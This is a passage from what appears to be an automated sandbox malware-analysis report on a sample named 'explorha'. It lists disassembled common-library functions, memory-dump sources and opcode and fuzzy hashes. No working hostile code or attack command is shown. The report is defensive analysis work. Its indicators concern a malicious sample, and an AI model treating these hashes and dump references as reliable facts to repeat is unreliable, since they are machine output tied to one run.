                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 2033596534-0
                                                                                                      • Opcode ID: 760409254fd9b053e18a3c0aedda8c59325842c39b18659847eb2442941f2784
                                                                                                      • Instruction ID: 3937e72bdf01c63df3db9244b2f58beddff7f2fe338535012de12c8cbf272895
                                                                                                      • Opcode Fuzzy Hash: 760409254fd9b053e18a3c0aedda8c59325842c39b18659847eb2442941f2784
                                                                                                      • Instruction Fuzzy Hash: E921AF319006189FDB05FFA8D882DADBBF4FF45314B244069F055EB292DB70AE42CB56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088B6B6 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0088B6F9
                                                                                                        • Part of subcall function 0088CBF0: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0088CC3F
                                                                                                      • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0088B70F
                                                                                                      • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0088B75B
                                                                                                        • Part of subcall function 0088C1D1: List.LIBCONCRT ref: 0088C207
                                                                                                      • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0088B76B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                      • String ID:
                                                                                                      • API String ID: 932774601-0
                                                                                                      • Opcode ID: f2a7e931c79aea77b4288e5d662afd6a7bc02e69ca304990fd166419e771191a
                                                                                                      • Instruction ID: 11db55e3c053b8ff3ad9c8adbd35be4cd9ffb9faace0abdda8b6eef17921a01f
                                                                                                      • Opcode Fuzzy Hash: f2a7e931c79aea77b4288e5d662afd6a7bc02e69ca304990fd166419e771191a
                                                                                                      • Instruction Fuzzy Hash: 89218C31900B149FCB24FF69DA918AAF3F9FF88300700495DE546A7661DB34F905CBA6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008904EC Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ListArray.LIBCONCRT ref: 008904FA
                                                                                                      • ListArray.LIBCONCRT ref: 0089050C
                                                                                                        • Part of subcall function 008905B9: _InternalDeleteHelper.LIBCONCRT ref: 008905CB
                                                                                                      • ListArray.LIBCONCRT ref: 00890516
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 0089052F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ArrayList$DeleteHelperInternal
                                                                                                      • String ID:
                                                                                                      • API String ID: 3844194624-0
                                                                                                      • Opcode ID: fbd71efcd49993942103e987dd111784402c7eba017c9987cea160ef3737de52
                                                                                                      • Instruction ID: 92e97856c8334955d9225396b40970a94924942540d6c03412942f65a55fa361
                                                                                                      • Opcode Fuzzy Hash: fbd71efcd49993942103e987dd111784402c7eba017c9987cea160ef3737de52
                                                                                                      • Instruction Fuzzy Hash: A601D672200621AFDF157B68DC8297DB75AFF9871070A4029F904E7616CB20EC219FD2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088E747 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ListArray.LIBCONCRT ref: 0088E755
                                                                                                      • ListArray.LIBCONCRT ref: 0088E767
                                                                                                        • Part of subcall function 0088DD42: _InternalDeleteHelper.LIBCONCRT ref: 0088DD54
                                                                                                      • ListArray.LIBCONCRT ref: 0088E771
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 0088E78A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ArrayList$DeleteHelperInternal
                                                                                                      • String ID:
                                                                                                      • API String ID: 3844194624-0
                                                                                                      • Opcode ID: 8d50871b56444dde2135b8b220b9f1000033a64c1f0159b6690891ba1d2ad9aa
                                                                                                      • Instruction ID: 967d3af73fcfa89619df60ea043272d034feb657b91cb05239306373fcb3b97c
                                                                                                      • Opcode Fuzzy Hash: 8d50871b56444dde2135b8b220b9f1000033a64c1f0159b6690891ba1d2ad9aa
                                                                                                      • Instruction Fuzzy Hash: CB01F432241631AFCB25BB68CDC2E6DBB1AFFD87107044129F904DB652DB20EC2187A6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00894A4E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00894A68
                                                                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00894A7C
                                                                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00894A94
                                                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00894AAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
